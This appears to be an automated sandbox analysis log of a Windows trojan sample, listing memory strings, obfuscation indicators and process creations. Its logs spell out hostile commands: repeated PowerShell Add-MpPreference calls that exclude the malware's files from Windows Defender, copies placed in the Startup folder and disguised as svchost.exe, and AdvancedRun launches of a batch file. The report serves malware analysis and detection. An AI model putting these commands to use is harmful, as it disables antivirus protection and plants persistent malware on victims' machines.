                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exeString found in binary or memory: https://mhconsultores.net.ve/
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.308834752.0000021F0B445000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: VknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: powershell.exeProcess created: 46

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: VknMvPoCXZ.exe, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 481F404B.exe.1.dr, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: svchost.exe.1.dr, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.2.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.13.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.15.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 1.0.VknMvPoCXZ.exe.200000.1.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: 24.0.481F404B.exe.a50000.0.unpack, u0039BD3B5D7/C84CE241.csLarge array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_002A55BB1_2_002A55BB
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_002A098B1_2_002A098B
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeCode function: 1_2_024CC1F01_2_024CC1F0
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_0057098B40_2_0057098B
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_005755BB40_2_005755BB
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_011E98B040_2_011E98B0
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_0705692840_2_07056928
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_0705C81940_2_0705C819
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeCode function: 40_2_0705709040_2_07057090
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.24.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: VknMvPoCXZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Windows\Resources\Themes\aero\Shell\4B6A7152Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameAntiDump.dll2 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualStudio.DevOps.Telemetry.dllP vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevxrSmzjNKOKDOsAsVgFGKyJwRVHn.exe4 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs VknMvPoCXZ.exe
                      Source: VknMvPoCXZ.exeStatic PE information: invalid certificate
                      Source: VknMvPoCXZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@113/58@0/2
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,6_2_00401306
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,6_2_0040A33B
                      Source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: VknMvPoCXZ.exeVirustotal: Detection: 47%
                      Source: VknMvPoCXZ.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile read: C:\Users\user\Desktop\VknMvPoCXZ.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\VknMvPoCXZ.exe 'C:\Users\user\Desktop\VknMvPoCXZ.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: unknownProcess created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                      Source: unknownProcess created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /SpecialRun 4101d8 6644
                      Source: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /SpecialRun 4101d8 6512
                      Source: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /SpecialRun 4101d8 6820
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
